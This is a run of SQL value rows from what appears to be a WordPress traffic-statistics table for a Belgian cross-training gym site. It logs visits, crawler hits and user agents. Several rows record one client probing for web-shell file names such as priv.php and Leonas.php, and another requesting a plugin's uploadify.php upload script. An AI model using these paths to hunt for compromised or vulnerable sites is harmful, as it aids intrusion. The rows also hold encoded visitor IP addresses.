(70561, 1492974611.747328, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70562, 1492974616.284210, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70563, 1492974616.865797, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70564, 1492974617.406213, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70565, 1492974618.147246, 1374841142, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0 like Mac OS X) AppleWebKit/602.1.38 (KHTML, like Gecko) Version/10.0 Mobile/14A300 Safari/602.1'),
(70566, 1492974618.692953, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70567, 1492974619.217410, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70568, 1492974619.747568, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70569, 1492974620.394988, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70570, 1492974620.881849, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70571, 1492974621.373950, 1374841142, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Safari/11603.1.30.0.34 CFNetwork/760.6.3 Darwin/15.6.0 (x86_64)'),
(70572, 1492975081.024127, 676177687, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70573, 1492975081.470127, 676177687, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70574, 1492980823.692709, 676177832, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70575, 1492982643.997922, 2996488207, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70576, 1492982647.490979, 2996488216, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)'),
(70577, 1492984227.759486, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70578, 1492984237.325766, 2499535434, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70579, 1492986821.124671, 1123631302, 0, 0, 1, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'),
(70580, 1492994176.912102, 2499535434, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup.com/crawler.html)'),
(70581, 1492996226.183543, 3112255039, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-conten1.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70582, 1492996228.120930, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/BLL.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70583, 1492996239.841296, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/0.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70584, 1492996241.666700, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/priv.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70585, 1492996243.059687, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/admin.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70586, 1492996244.378382, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/form.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70587, 1492996245.741168, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wrm.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70588, 1492996252.240533, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Leonas.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70589, 1492996258.950441, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/403.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70590, 1492996260.393850, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/cox.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70591, 1492996261.810543, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/fozi.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70592, 1492996263.289449, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/cv.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70593, 1492996264.607746, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wss.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70594, 1492996274.486480, 3112255039, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/Mamha.php', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31'),
(70595, 1493011004.734636, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70596, 1493011005.312248, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70597, 1493011005.848472, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70598, 1493011006.370930, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70599, 1493011006.961602, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70600, 1493011007.460029, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70601, 1493011008.015652, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70602, 1493011008.521588, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70603, 1493011008.973412, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70604, 1493011009.482493, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70605, 1493011009.907923, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70606, 1493013111.510453, 2954838202, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/hello-world/', '', 'Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko'),
(70607, 1493013689.837164, 1837165719, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70608, 1493013690.336908, 1837165719, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70609, 1493013690.774206, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70610, 1493013691.196770, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70611, 1493013691.621152, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70612, 1493013692.060333, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70613, 1493013692.559764, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70614, 1493013693.057566, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70615, 1493013693.470375, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70616, 1493013694.139168, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70617, 1493013694.565080, 1837165719, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70618, 1493014489.115343, 1538649748, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70619, 1493014490.365996, 96767447, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/stats-counter/img/icon.png', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0'),
(70620, 1493014612.065586, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', 'http://www.crosstrainingcenter.be/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70621, 1493014612.078353, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(70622, 1493014612.545918, 1538649748, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'Safari/10603.1.30.0.34 CFNetwork/720.5.7 Darwin/14.5.0 (x86_64)'),
(70623, 1493014848.459813, 1538649748, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70624, 1493016515.175820, 632890059, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70625, 1493016516.065263, 632890059, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70626, 1493016516.496278, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70627, 1493016516.926285, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70628, 1493016517.801746, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70629, 1493016518.333977, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70630, 1493016519.011634, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70631, 1493016519.502652, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70632, 1493016519.968898, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70633, 1493016520.453283, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70634, 1493016520.933851, 632890059, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70635, 1493024026.381610, 676177850, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70636, 1493024963.805205, 3639891306, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php', 'http://crosstrainingcenter.be/wp-content/plugins/wp-front-end-repository/js/uploadify/uploadify.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.152 Safari/537.36'),
(70637, 1493030578.451997, 400891747, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://crosstrainingcenter.be', 'Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'),
(70638, 1493034169.850475, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70639, 1493034170.296894, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70640, 1493034171.005594, 1837933865, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70641, 1493034174.770736, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70642, 1493034182.262323, 2297635928, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70643, 1493034251.391477, 2297635928, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/comments/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70644, 1493034330.754190, 1837933865, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70645, 1493034331.452201, 1837933865, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70646, 1493034332.175155, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70647, 1493034332.694032, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70648, 1493034333.178812, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70649, 1493034333.742687, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70650, 1493034334.376243, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70651, 1493034334.922389, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70652, 1493034335.418861, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70653, 1493034335.911768, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70654, 1493034336.460617, 1837933865, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70655, 1493034384.565852, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70656, 1493034384.970950, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/en-images/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70657, 1493034451.337101, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70658, 1493034602.280830, 2297635928, 0, 0, 0, 0, 1, 'http://crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70659, 1493034602.870048, 2297635928, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/lequipe/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70660, 1493034608.929890, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/notre-philosophie/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70661, 1493034612.564733, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70662, 1493034620.823526, 2297635928, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/266-2/feed/', '', 'Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)'),
(70663, 1493043058.432474, 3587417960, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70664, 1493043118.292352, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/contact/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70665, 1493043129.267041, 3587417960, 1, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', 'http://www.crosstrainingcenter.be/contact/', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70666, 1493043347.324010, 3587417960, 0, 0, 0, 0, 0, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70667, 1493047043.854320, 3587417960, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.1 Safari/603.1.30'),
(70668, 1493050044.785289, 1078646641, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', '\\\'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)\\\''),
(70669, 1493060527.004491, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70670, 1493060920.553896, 3639886562, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)'),
(70671, 1493062917.543564, 3475901711, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70672, 1493063958.421778, 1439296427, 1, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/les-seances-namur/', 'https://www.google.be/', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_0_2 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/14A456 Safari/602.1'),
(70673, 1493065490.575813, 3024883592, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/le-cross-training/', '', 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)'),
(70674, 1493067316.804067, 676177817, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70675, 1493067317.111336, 676177817, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/robots.txt', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70676, 1493079473.974704, 2637637586, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/notre-philosophie/feed/', '', 'Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)'),
(70677, 1493083228.856051, 1338304744, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/sitemap.xml', '', 'Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 ( .NET CLR 3.5.30729)'),
(70678, 1493096598.392360, 1837858581, 0, 0, 0, 0, 1, 'http://www.crosstrainingcenter.be/', '', 'Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_1 like Mac OS X) AppleWebKit/603.1.30 (KHTML, like Gecko) Version/10.0 Mobile/14E304 Safari/602.1'),
(70679, 1493096599.015514, 1837858581, 0, 1, 0, 0, 1, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70680, 1493096599.564970, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70681, 1493096600.063872, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70682, 1493096600.572902, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70683, 1493096601.081861, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/wp-content/themes/figero/images/favicon.ico', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
(70684, 1493096601.702569, 1837858581, 0, 1, 0, 0, 0, 'http://www.crosstrainingcenter.be/apple-touch-icon-120x120-precomposed.png', '', 'MobileSafari/602.1 CFNetwork/811.4.18 Darwin/16.5.0'),
